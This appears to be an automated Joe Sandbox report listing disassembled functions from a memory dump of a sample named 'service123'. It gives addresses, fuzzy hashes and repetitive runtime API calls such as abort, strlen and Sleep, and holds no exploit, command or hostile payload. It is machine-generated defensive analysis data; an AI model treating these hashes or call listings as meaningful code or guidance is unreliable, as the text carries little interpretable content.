Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d045f474f8ec0b0ea33914fe5e5440dfa9cfe9c2c8d3373ee72e6220ca3cd64
Instruction ID: f05162409399cbd422bb4992b3f25d99dd50de8478836f7a569fb80081a17cf3
Opcode Fuzzy Hash: 4d045f474f8ec0b0ea33914fe5e5440dfa9cfe9c2c8d3373ee72e6220ca3cd64
Instruction Fuzzy Hash: 4EB1D07160C3468FD710DF28C48075ABBE1BF9A308F09896DE994DBB42C375E948CB92

Function 6C94C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8ae86d00c743f562876cac388b1d864fa95dd69f373e1b2efd9a874251a55bf3
Instruction ID: 395a8dff96196ef8796286b29933b41f7c07bab2927816e0dbecaa2028959d9e
Opcode Fuzzy Hash: 8ae86d00c743f562876cac388b1d864fa95dd69f373e1b2efd9a874251a55bf3
Instruction Fuzzy Hash: BA419EB1A052158FCB00DF68C4917E9BBF5BF4A348F18846AD955DF782D335D4468B60

Function 6C94D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C94CD00: strlen.MSVCRT ref: 6C94CD7D

Sleep.KERNEL32 ref: 6C94D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 2be3d54a996dc1111de7c660a0dc5e83759623b1ec16aa825df1e789ffc9ad95
Instruction ID: aa067c51a603f74ddebe3e836d7645ead19424fe4b267b0f1d7316115ea19660
Opcode Fuzzy Hash: 2be3d54a996dc1111de7c660a0dc5e83759623b1ec16aa825df1e789ffc9ad95
Instruction Fuzzy Hash: 0451DCA56283C2CAEB19CB3AC0457257FB5675330CF09955CC6C88B782D3BA990AC776

Function 6C94D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c1a241c9ef1348b257786635eaa152379e6a840d653ce8b3e6fd937f91ac3fd9
Instruction ID: c55e95d9597e194b4ca6e572539f79803f4fca79f947e01029046ad68899125e
Opcode Fuzzy Hash: c1a241c9ef1348b257786635eaa152379e6a840d653ce8b3e6fd937f91ac3fd9
Instruction Fuzzy Hash: 90319E756193068FE310DE69D88076AB7E8EF8635CF14C92EE588C7B01E734E544CB92

Function 6C94D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: c777ff9a2bf0ea45437b258fa03ff0cefc67f80169b66c4f837eed6c86081a63
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: B1B01278CDD620C35340BBB404400B5B2389B3334CF42BC04410673E010B00F466D064

Function 6C94D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 996b78433ec7b5c334b886a3a60da002be242da945c809d495876e3823f75b49
Instruction ID: 65c0e2e588c51dad811fcff9410e9458adf74ba551680a88da67c7fc2e5a4487
Opcode Fuzzy Hash: 996b78433ec7b5c334b886a3a60da002be242da945c809d495876e3823f75b49
Instruction Fuzzy Hash: 864135B9A093018FE310DF1AC58076ABBE4EB89708F10CD2EE598C7B51D375D8488B92

Function 6C94D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: c51d485a168ee514fb632d48e712d667b8e7fedf6d57bd22a1cd89252016cdd6
Instruction ID: 03e22999e91d8d38a3e86387a325cf32b0d7b57585954dc340920aaceface4b4
Opcode Fuzzy Hash: c51d485a168ee514fb632d48e712d667b8e7fedf6d57bd22a1cd89252016cdd6
Instruction Fuzzy Hash: CFE06D7691C6564BE710EE68D0803297BA5AB8330CF545C9CD6956BF42C364E85BC781

Function 6C95C0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C95C151
fwrite.MSVCRT ref: 6C95C1F8
fputs.MSVCRT ref: 6C95C215
fwrite.MSVCRT ref: 6C95C23E
fputs.MSVCRT ref: 6C95C25D
fwrite.MSVCRT ref: 6C95C28C
fwrite.MSVCRT ref: 6C95C2BE
abort.MSVCRT ref: 6C95C2C3
abort.MSVCRT ref: 6CA16157
free.MSVCRT ref: 6CA1615F

Part of subcall function 6C94A340: strlen.MSVCRT ref: 6C94A3C5
Part of subcall function 6C94A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C95C1CC), ref: 6C94A3E0
Part of subcall function 6C94A340: free.MSVCRT ref: 6C94A3EA

Strings

-, xrefs: 6C95C271
terminate called after throwing an instance of ', xrefs: 6C95C1F1
terminate called without an active exception, xrefs: 6C95C285
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C95C0F9

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: e3bd94e01383933a3a0c15ef436faa869eda341a8a6596d0d2a205c0dd2534dc
Instruction ID: c14b6fa76498cbf3ed94e13e6082d4b8e95f4f567aea83b610f89a620ca43d9b
Opcode Fuzzy Hash: e3bd94e01383933a3a0c15ef436faa869eda341a8a6596d0d2a205c0dd2534dc
Instruction Fuzzy Hash: 7C5148B48083159FEB00EF68C48979ABBF4AF95318F05C91DE49987B41D778D489CB92

Function 6C94D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 93b1270be92d1a40d3c48d6b92552fa80b4c8bbbb7cc0e29dfe3a21f617491a9
Instruction ID: 917f07ff1378e8902b82d5ecfd3e4c67858dd2d00256af6703742a131be70893
Opcode Fuzzy Hash: 93b1270be92d1a40d3c48d6b92552fa80b4c8bbbb7cc0e29dfe3a21f617491a9
Instruction Fuzzy Hash: 3CF082F19793454FE310DF28C4817667BA5BB43319F885C88D8845BB42C329D8A9DBA1

Function 6C94DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C94DEB8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 16f69de146e1f1f7bd871443f4afc2bc9900cb5cec17fbdc4fab5212bd847040
Instruction ID: 22499669ef7d2a4564ed24a3c601809448ae763eb624c1ca9cbafb798a5b5bb0
Opcode Fuzzy Hash: 16f69de146e1f1f7bd871443f4afc2bc9900cb5cec17fbdc4fab5212bd847040
Instruction Fuzzy Hash: 5921C376A0561DCADB10DF50CC84BDE77B8AB96308F1085A6C808ABB00E730DE88CF90

Function 6C94DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 767a3e1e4454b961f65bc2400cb00ba377fcfa76efdce0a5e002d7e3c5f27877
Instruction ID: 4698e40cd6cdf398bb8619aab5500fe37a6e3798274c167e1a5820d0ffb8c872
Opcode Fuzzy Hash: 767a3e1e4454b961f65bc2400cb00ba377fcfa76efdce0a5e002d7e3c5f27877
Instruction Fuzzy Hash: A5413C79A042199BCB10DF64C8807DEB7B5AF99318F14C9A9D849A7B00D730EE89CF90

Function 6C94DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 087cf04596220b34de37ee4a123a460a2dbea9a130974693366de84cf0350967
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: D1112E79A042189BCB14DF64C8809DEB7B5AFA6358F45C964EC0967B01DB30EE49CBE0

Function 6C94DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: ea5d05b06278b391d3e562c906185fc2a700ffd9cb9d394375a88d74ea63ca6a
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: 66212C79A0421D9BCF10DF60C8809DEB7B5EF99308F15C8A8D80967B41D730EE4ACB90

